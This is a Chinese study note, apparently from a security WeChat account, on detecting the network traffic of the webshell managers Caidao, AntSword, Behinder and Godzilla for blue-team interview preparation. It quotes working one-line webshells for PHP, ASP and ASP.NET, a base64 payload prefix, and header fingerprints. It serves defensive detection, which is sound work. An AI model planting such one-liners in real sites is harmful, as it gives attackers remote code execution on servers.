HW知识点回顾（webshell的流量分析）

近期要准备HW了，这里就更新一点相关面试可能会问的问题。

菜刀流量分析：

payload的特征：PHP：<?php @eval($_POST["cai"]); ?>ASP: <%eval request("bai")%>ASP.NET:<%@ Page  Language=“Jscript”%><%eval(Request.Item[“caidao”],“unsafe”);%>

数据包流量特征：

1、请求包中 ua头位百度，火狐

2、请求实体中存在eval，base64等特征字符

3、请求实体中传递depayload为base64编码，并且存在固定的：

QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7J

蚁剑流量分析：

payload特征：

php中使用assert，eval执行，asp中使用eval，在jsp使用的是Java类加载（classLoader）,同时会带有base64编码解码等样式

数据包流量特征：

使用普通的一句话都存在以下特征：

每个请求实体都存在

@ini_set(“display_errors”, “0”);@set_time_limit(0)

开头。并且后面存在base64等字符

响应包返回格式：

随机数，响应内容，随机数

使用base64加密的payload，数据包存在以下base加密的eval命令，数据包中的payload几个分段内容都是用了base加密，解密之后可以看到相关的路径和命令等。

冰蝎流量分析：

payload分析：

php在代码中同样会存在eval或者assert等字符特征。

asp中会在for循环进行一段异或处理

在jsp中则利用java的反射，所以会存在ClassLoader，getClass().getClassLoader()等字符特征

冰蝎2.0流量特征：

第一阶段中请求返回包状态码为200，返回的内容必定是16位的密钥

请求包存在：

Accept: text/html, image/gif, image/jpeg, ; q=.2, /; q=.2

建立连接后的cookie存在特征字符

所有请求 Cookie的格式都为:

 Cookie: PHPSESSID=; path=/；

冰蝎3.0流量特征：

请求包中content-length 为5740或5720（可能会根据Java版本而改变）

每一个请求头中存在

Pragma: no-cache，Cache-Control: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/*;q=0.8,application/signed-exchange;v=b3;q=0.9

哥斯拉流量特征：

payload特征：

jsp会出现xc,pass字符和Java反射（ClassLoader，getClass().getClassLoader()），base64加解码等特征

php，asp则为普通的一句话木马

哥斯拉流量分析：

作为参考：

所有请求中Accept:

 text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8

所有响应中Cache-Control: no-store, no-cache, must-revalidate,

同时在所有请求中Cookie中后面都存在

原文始发于微信公众号（白安全组）：HW知识点回顾（webshell的流量分析）